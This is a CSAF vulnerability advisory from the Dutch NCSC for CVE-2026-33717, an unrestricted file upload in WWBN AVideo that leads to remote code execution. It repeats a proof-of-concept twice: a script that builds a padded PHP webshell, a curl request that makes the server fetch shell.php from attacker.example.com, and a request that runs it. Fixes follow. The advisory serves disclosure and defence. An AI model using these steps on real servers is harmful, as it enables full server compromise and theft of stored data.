{
"document": {
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE"
}
},
"lang": "en",
"notes": [
{
"category": "legal_disclaimer",
"text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
}
],
"publisher": {
"category": "coordinator",
"contact_details": "cert@ncsc.nl",
"name": "National Cyber Security Centre",
"namespace": "https://www.ncsc.nl/"
},
"title": "CVE-2026-33717",
"tracking": {
"current_release_date": "2026-03-26T00:45:27.464425Z",
"generator": {
"date": "2026-02-17T15:00:00Z",
"engine": {
"name": "V.E.L.M.A",
"version": "1.7"
}
},
"id": "CVE-2026-33717",
"initial_release_date": "2026-03-24T13:52:33.003451Z",
"revision_history": [
{
"date": "2026-03-24T13:52:33.003451Z",
"number": "1",
"summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
},
{
"date": "2026-03-24T13:52:43.554272Z",
"number": "2",
"summary": "NCSC Score created."
},
{
"date": "2026-03-24T14:25:34.547941Z",
"number": "3",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)."
},
{
"date": "2026-03-24T14:25:38.567824Z",
"number": "4",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-24T20:51:31.094185Z",
"number": "5",
"summary": "Unknown change."
},
{
"date": "2026-03-24T21:37:16.421818Z",
"number": "6",
"summary": "Source connected.| CVE status created. (valid)| EPSS created."
},
{
"date": "2026-03-24T21:37:34.795444Z",
"number": "7",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-25T15:27:05.733565Z",
"number": "8",
"summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
},
{
"date": "2026-03-25T15:27:08.196260Z",
"number": "9",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-25T21:49:48.827113Z",
"number": "10",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
},
{
"date": "2026-03-25T21:50:02.766645Z",
"number": "11",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-26T00:45:01.321321Z",
"number": "12",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (3).| CWES updated (1)."
}
],
"status": "interim",
"version": "12"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/<=26.0",
"product": {
"name": "vers:unknown/<=26.0",
"product_id": "CSAFPID-5893889",
"product_identification_helper": {
"cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*"
}
}
}
],
"category": "product_name",
"name": "AVideo"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/10.4",
"product": {
"name": "vers:unknown/10.4",
"product_id": "CSAFPID-5656122",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@10.4"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/10.8",
"product": {
"name": "vers:unknown/10.8",
"product_id": "CSAFPID-5656123",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@10.8"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/11",
"product": {
"name": "vers:unknown/11",
"product_id": "CSAFPID-5656124",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@11"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/11.1",
"product": {
"name": "vers:unknown/11.1",
"product_id": "CSAFPID-5656125",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@11.1"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/11.1.1",
"product": {
"name": "vers:unknown/11.1.1",
"product_id": "CSAFPID-5656126",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@11.1.1"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/11.5",
"product": {
"name": "vers:unknown/11.5",
"product_id": "CSAFPID-5656127",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@11.5"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/11.6",
"product": {
"name": "vers:unknown/11.6",
"product_id": "CSAFPID-5656128",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@11.6"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/12.4",
"product": {
"name": "vers:unknown/12.4",
"product_id": "CSAFPID-5656129",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@12.4"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/14.3",
"product": {
"name": "vers:unknown/14.3",
"product_id": "CSAFPID-5656130",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@14.3"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/14.3.1",
"product": {
"name": "vers:unknown/14.3.1",
"product_id": "CSAFPID-5656131",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@14.3.1"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/14.4",
"product": {
"name": "vers:unknown/14.4",
"product_id": "CSAFPID-5656132",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@14.4"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/18.0",
"product": {
"name": "vers:unknown/18.0",
"product_id": "CSAFPID-5656133",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@18.0"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/21.0",
"product": {
"name": "vers:unknown/21.0",
"product_id": "CSAFPID-5721197",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@21.0"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/22.0",
"product": {
"name": "vers:unknown/22.0",
"product_id": "CSAFPID-5772271",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@22.0"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/24.0",
"product": {
"name": "vers:unknown/24.0",
"product_id": "CSAFPID-5772272",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@24.0"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/25.0",
"product": {
"name": "vers:unknown/25.0",
"product_id": "CSAFPID-5840723",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@25.0"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/26.0",
"product": {
"name": "vers:unknown/26.0",
"product_id": "CSAFPID-5878928",
"product_identification_helper": {
"purl": "pkg:composer/wwbn/avideo@26.0"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/>=0|<=26.0",
"product": {
"name": "vers:unknown/>=0|<=26.0",
"product_id": "CSAFPID-5878929"
}
}
],
"category": "product_name",
"name": "avideo"
}
],
"category": "vendor",
"name": "WWBN"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-33717",
"cwe": {
"id": "CWE-434",
"name": "Unrestricted Upload of File with Dangerous Type"
},
"notes": [
{
"category": "description",
"text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `downloadVideoFromDownloadURL()` function in `objects/aVideoEncoder.json.php` saves remote content to a web-accessible temporary directory using the original URL's filename and extension (including `.php`). By providing an invalid `resolution` parameter, an attacker triggers an early `die()` via `forbiddenPage()` before the temp file can be moved or cleaned up, leaving an executable PHP file persistently accessible under the web root at `videos/cache/tmpFile/`. Commit 6da79b43484099a0b660d1544a63c07b633ed3a2 contains a patch.",
"title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33717"
},
{
"category": "description",
"text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `downloadVideoFromDownloadURL()` function in `objects/aVideoEncoder.json.php` saves remote content to a web-accessible temporary directory using the original URL's filename and extension (including `.php`). By providing an invalid `resolution` parameter, an attacker triggers an early `die()` via `forbiddenPage()` before the temp file can be moved or cleaned up, leaving an executable PHP file persistently accessible under the web root at `videos/cache/tmpFile/`. Commit 6da79b43484099a0b660d1544a63c07b633ed3a2 contains a patch.",
"title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33717.json"
},
{
"category": "description",
"text": "## Summary\n\nThe `downloadVideoFromDownloadURL()` function in `objects/aVideoEncoder.json.php` saves remote content to a web-accessible temporary directory using the original URL's filename and extension (including `.php`). By providing an invalid `resolution` parameter, an attacker triggers an early `die()` via `forbiddenPage()` before the temp file can be moved or cleaned up, leaving an executable PHP file persistently accessible under the web root at `videos/cache/tmpFile/`.\n\n## Details\n\nThe vulnerability is a race-free file upload leading to RCE, exploiting a logic flaw in the error handling order of operations.\n\n**Step 1 — File download preserves dangerous extension:**\n\nIn `objects/aVideoEncoder.json.php`, when a `downloadURL` parameter is provided, the file is downloaded and saved with the URL's original basename:\n\n```php\n// objects/aVideoEncoder.json.php:361-365\n$_FILES['video']['name'] = basename($downloadURL); // preserves .php extension\n$temp = Video::getStoragePath() . \"cache/tmpFile/\" . $_FILES['video']['name'];\nmake_path($temp);\n$bytesSaved = file_put_contents($temp, $file);\n```\n\nThe `format` parameter (validated against `$global['allowedExtension']` at line 42) is only used later for the *final* destination filename (line 238), not for the temp file. The temp file uses `basename($downloadURL)` directly, allowing any extension including `.php`.\n\n**Step 2 — Resolution validation aborts after file write:**\n\nAfter the file is downloaded and written to disk (line 156), the resolution is validated:\n\n```php\n// objects/aVideoEncoder.json.php:229-233\nif (!in_array($_REQUEST['resolution'], $global['avideo_possible_resolutions'])) {\n $msg = \"This resolution is not possible {$_REQUEST['resolution']}\";\n _error_log($msg);\n forbiddenPage($msg); // calls die() — execution stops here\n}\n```\n\nThe `forbiddenPage()` function (in `objects/functionsSecurity.php:567-573`) detects the JSON content type set at line 26 and calls `die()`:\n\n```php\nif (empty($unlockPassword) && isContentTypeJson()) {\n // ...\n die(json_encode($obj)); // line 573 — execution terminates\n}\n```\n\n**Step 3 — Cleanup never reached:**\n\nThe `decideMoveUploadedToVideos()` call at line 243, which would move the temp file to its final destination with the safe `format` extension, is never reached because `forbiddenPage()` terminates execution first.\n\n**Step 4 — No execution restrictions on temp directory:**\n\nThe `videos/cache/tmpFile/` directory has no `.htaccess` file restricting PHP execution. The root `.htaccess` `FilesMatch` on line 73 blocks extensions matching `php[a-z0-9]+` (e.g., `.php5`, `.phtml`) but does **not** match plain `.php`.\n\n## PoC\n\n**Prerequisites:** An authenticated user account with `canUpload` permission. An attacker-controlled server hosting a PHP payload file at least 20KB in size.\n\n**Step 1 — Prepare the PHP payload (on attacker server):**\n\n```bash\n# Create a PHP webshell padded to >=20KB to pass the minimum size check\npython3 -c \"\npayload = b''\npadding = b'\\n' + b'/' * (20001 - len(payload))\nopen('shell.php', 'wb').write(payload + padding)\n\"\n# Host it on an attacker-controlled server (e.g., https://attacker.example.com/shell.php)\n```\n\n**Step 2 — Trigger the download with invalid resolution:**\n\n```bash\ncurl -X POST 'https://target.example.com/objects/aVideoEncoder.json.php' \\\n -d 'user=uploader_username' \\\n -d 'pass=uploader_password' \\\n -d 'format=mp4' \\\n -d 'downloadURL=https://attacker.example.com/shell.php' \\\n -d 'resolution=9999'\n```\n\nExpected response: `{\"error\":true,\"msg\":\"This resolution is not possible 9999\",\"forbiddenPage\":true}`\n\n**Step 3 — Access the persisted PHP file:**\n\n```bash\ncurl 'https://target.example.com/videos/cache/tmpFile/shell.php'\n```\n\nExpected output: `RCE:Linux target 5.15.0-...` — confirming arbitrary PHP code execution on the server.\n\n## Impact\n\nAn authenticated user with standard upload permissions can achieve **Remote Code Execution** on the server. This allows:\n\n- Full server compromise — read/write arbitrary files, execute system commands\n- Access to database credentials and all stored user data\n- Lateral movement to other services on the same network\n- Modification or destruction of all video content and platform configuration\n- Use of the server as a pivot point for further attacks\n\nThe attack requires only a single HTTP request (plus hosting a payload file) and leaves no trace in the application's normal upload/video processing logs beyond the download attempt.\n\n## Recommended Fix\n\n**Fix 1 (Primary) — Validate file extension in `downloadVideoFromDownloadURL()`:**\n\n```php\n// objects/aVideoEncoder.json.php — in downloadVideoFromDownloadURL(), after line 360\nfunction downloadVideoFromDownloadURL($downloadURL)\n{\n global $global, $obj;\n $downloadURL = trim($downloadURL);\n\n // ... existing SSRF check ...\n\n // NEW: Validate the file extension against allowed extensions\n $urlExtension = strtolower(pathinfo(parse_url($downloadURL, PHP_URL_PATH), PATHINFO_EXTENSION));\n if (!in_array($urlExtension, $global['allowedExtension'])) {\n __errlog(\"aVideoEncoder.json:downloadVideoFromDownloadURL blocked dangerous extension: \" . $urlExtension);\n return false;\n }\n\n // ... rest of function ...\n}\n```\n\n**Fix 2 (Defense in depth) — Move resolution validation before file download:**\n\n```php\n// objects/aVideoEncoder.json.php — move lines 227-236 to BEFORE line 154\n// Validate resolution BEFORE downloading anything\nif (!empty($_REQUEST['resolution'])) {\n if (!in_array($_REQUEST['resolution'], $global['avideo_possible_resolutions'])) {\n $msg = \"This resolution is not possible {$_REQUEST['resolution']}\";\n _error_log($msg);\n forbiddenPage($msg);\n }\n}\n// Then proceed with download...\n```\n\n**Fix 3 (Defense in depth) — Add `.htaccess` to temp directory:**\n\nCreate `videos/cache/tmpFile/.htaccess`:\n```apache\n# Deny execution of all scripts in temp directory\n\n Require all denied\n\nphp_flag engine off\n```",
"title": "github - https://api.github.com/advisories/GHSA-8wf4-c4x3-h952"
},
{
"category": "description",
"text": "## Summary\n\nThe `downloadVideoFromDownloadURL()` function in `objects/aVideoEncoder.json.php` saves remote content to a web-accessible temporary directory using the original URL's filename and extension (including `.php`). By providing an invalid `resolution` parameter, an attacker triggers an early `die()` via `forbiddenPage()` before the temp file can be moved or cleaned up, leaving an executable PHP file persistently accessible under the web root at `videos/cache/tmpFile/`.\n\n## Details\n\nThe vulnerability is a race-free file upload leading to RCE, exploiting a logic flaw in the error handling order of operations.\n\n**Step 1 — File download preserves dangerous extension:**\n\nIn `objects/aVideoEncoder.json.php`, when a `downloadURL` parameter is provided, the file is downloaded and saved with the URL's original basename:\n\n```php\n// objects/aVideoEncoder.json.php:361-365\n$_FILES['video']['name'] = basename($downloadURL); // preserves .php extension\n$temp = Video::getStoragePath() . \"cache/tmpFile/\" . $_FILES['video']['name'];\nmake_path($temp);\n$bytesSaved = file_put_contents($temp, $file);\n```\n\nThe `format` parameter (validated against `$global['allowedExtension']` at line 42) is only used later for the *final* destination filename (line 238), not for the temp file. The temp file uses `basename($downloadURL)` directly, allowing any extension including `.php`.\n\n**Step 2 — Resolution validation aborts after file write:**\n\nAfter the file is downloaded and written to disk (line 156), the resolution is validated:\n\n```php\n// objects/aVideoEncoder.json.php:229-233\nif (!in_array($_REQUEST['resolution'], $global['avideo_possible_resolutions'])) {\n $msg = \"This resolution is not possible {$_REQUEST['resolution']}\";\n _error_log($msg);\n forbiddenPage($msg); // calls die() — execution stops here\n}\n```\n\nThe `forbiddenPage()` function (in `objects/functionsSecurity.php:567-573`) detects the JSON content type set at line 26 and calls `die()`:\n\n```php\nif (empty($unlockPassword) && isContentTypeJson()) {\n // ...\n die(json_encode($obj)); // line 573 — execution terminates\n}\n```\n\n**Step 3 — Cleanup never reached:**\n\nThe `decideMoveUploadedToVideos()` call at line 243, which would move the temp file to its final destination with the safe `format` extension, is never reached because `forbiddenPage()` terminates execution first.\n\n**Step 4 — No execution restrictions on temp directory:**\n\nThe `videos/cache/tmpFile/` directory has no `.htaccess` file restricting PHP execution. The root `.htaccess` `FilesMatch` on line 73 blocks extensions matching `php[a-z0-9]+` (e.g., `.php5`, `.phtml`) but does **not** match plain `.php`.\n\n## PoC\n\n**Prerequisites:** An authenticated user account with `canUpload` permission. An attacker-controlled server hosting a PHP payload file at least 20KB in size.\n\n**Step 1 — Prepare the PHP payload (on attacker server):**\n\n```bash\n# Create a PHP webshell padded to >=20KB to pass the minimum size check\npython3 -c \"\npayload = b''\npadding = b'\\n' + b'/' * (20001 - len(payload))\nopen('shell.php', 'wb').write(payload + padding)\n\"\n# Host it on an attacker-controlled server (e.g., https://attacker.example.com/shell.php)\n```\n\n**Step 2 — Trigger the download with invalid resolution:**\n\n```bash\ncurl -X POST 'https://target.example.com/objects/aVideoEncoder.json.php' \\\n -d 'user=uploader_username' \\\n -d 'pass=uploader_password' \\\n -d 'format=mp4' \\\n -d 'downloadURL=https://attacker.example.com/shell.php' \\\n -d 'resolution=9999'\n```\n\nExpected response: `{\"error\":true,\"msg\":\"This resolution is not possible 9999\",\"forbiddenPage\":true}`\n\n**Step 3 — Access the persisted PHP file:**\n\n```bash\ncurl 'https://target.example.com/videos/cache/tmpFile/shell.php'\n```\n\nExpected output: `RCE:Linux target 5.15.0-...` — confirming arbitrary PHP code execution on the server.\n\n## Impact\n\nAn authenticated user with standard upload permissions can achieve **Remote Code Execution** on the server. This allows:\n\n- Full server compromise — read/write arbitrary files, execute system commands\n- Access to database credentials and all stored user data\n- Lateral movement to other services on the same network\n- Modification or destruction of all video content and platform configuration\n- Use of the server as a pivot point for further attacks\n\nThe attack requires only a single HTTP request (plus hosting a payload file) and leaves no trace in the application's normal upload/video processing logs beyond the download attempt.\n\n## Recommended Fix\n\n**Fix 1 (Primary) — Validate file extension in `downloadVideoFromDownloadURL()`:**\n\n```php\n// objects/aVideoEncoder.json.php — in downloadVideoFromDownloadURL(), after line 360\nfunction downloadVideoFromDownloadURL($downloadURL)\n{\n global $global, $obj;\n $downloadURL = trim($downloadURL);\n\n // ... existing SSRF check ...\n\n // NEW: Validate the file extension against allowed extensions\n $urlExtension = strtolower(pathinfo(parse_url($downloadURL, PHP_URL_PATH), PATHINFO_EXTENSION));\n if (!in_array($urlExtension, $global['allowedExtension'])) {\n __errlog(\"aVideoEncoder.json:downloadVideoFromDownloadURL blocked dangerous extension: \" . $urlExtension);\n return false;\n }\n\n // ... rest of function ...\n}\n```\n\n**Fix 2 (Defense in depth) — Move resolution validation before file download:**\n\n```php\n// objects/aVideoEncoder.json.php — move lines 227-236 to BEFORE line 154\n// Validate resolution BEFORE downloading anything\nif (!empty($_REQUEST['resolution'])) {\n if (!in_array($_REQUEST['resolution'], $global['avideo_possible_resolutions'])) {\n $msg = \"This resolution is not possible {$_REQUEST['resolution']}\";\n _error_log($msg);\n forbiddenPage($msg);\n }\n}\n// Then proceed with download...\n```\n\n**Fix 3 (Defense in depth) — Add `.htaccess` to temp directory:**\n\nCreate `videos/cache/tmpFile/.htaccess`:\n```apache\n# Deny execution of all scripts in temp directory\n\n Require all denied\n\nphp_flag engine off\n```",
"title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-8wf4-c4x3-h952.json?alt=media"
},
{
"category": "other",
"text": "0.00042",
"title": "EPSS"
},
{
"category": "other",
"text": "3.3",
"title": "NCSC Score"
},
{
"category": "other",
"text": "Is related to CWE-434 (Unrestricted Upload of File with Dangerous Type), Is related to (a version of) an uncommon product, There is exploit data available from source Nvd",
"title": "NCSC Score top decreasing factors"
}
],
"product_status": {
"known_affected": [
"CSAFPID-5893889",
"CSAFPID-5656122",
"CSAFPID-5656123",
"CSAFPID-5656124",
"CSAFPID-5656125",
"CSAFPID-5656126",
"CSAFPID-5656127",
"CSAFPID-5656128",
"CSAFPID-5656129",
"CSAFPID-5656130",
"CSAFPID-5656131",
"CSAFPID-5656132",
"CSAFPID-5656133",
"CSAFPID-5721197",
"CSAFPID-5772271",
"CSAFPID-5772272",
"CSAFPID-5840723",
"CSAFPID-5878928",
"CSAFPID-5878929"
]
},
"references": [
{
"category": "external",
"summary": "Source - nvd",
"url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33717"
},
{
"category": "external",
"summary": "Source - cveprojectv5",
"url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33717.json"
},
{
"category": "external",
"summary": "Source - first",
"url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
},
{
"category": "external",
"summary": "Source - github",
"url": "https://api.github.com/advisories/GHSA-8wf4-c4x3-h952"
},
{
"category": "external",
"summary": "Source - osv",
"url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-8wf4-c4x3-h952.json?alt=media"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd; osv",
"url": "https://github.com/WWBN/AVideo/commit/6da79b43484099a0b660d1544a63c07b633ed3a2"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd; osv",
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8wf4-c4x3-h952"
},
{
"category": "external",
"summary": "Reference - github; osv",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33717"
},
{
"category": "external",
"summary": "Reference - github",
"url": "https://github.com/advisories/GHSA-8wf4-c4x3-h952"
}
],
"scores": [
{
"cvss_v3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"baseScore": 8.8,
"baseSeverity": "HIGH"
},
"products": [
"CSAFPID-5656122",
"CSAFPID-5656123",
"CSAFPID-5656124",
"CSAFPID-5656125",
"CSAFPID-5656126",
"CSAFPID-5656127",
"CSAFPID-5656128",
"CSAFPID-5656129",
"CSAFPID-5656130",
"CSAFPID-5656131",
"CSAFPID-5656132",
"CSAFPID-5656133",
"CSAFPID-5721197",
"CSAFPID-5772271",
"CSAFPID-5772272",
"CSAFPID-5840723",
"CSAFPID-5878928",
"CSAFPID-5878929",
"CSAFPID-5893889"
]
}
],
"title": "CVE-2026-33717"
}
]
}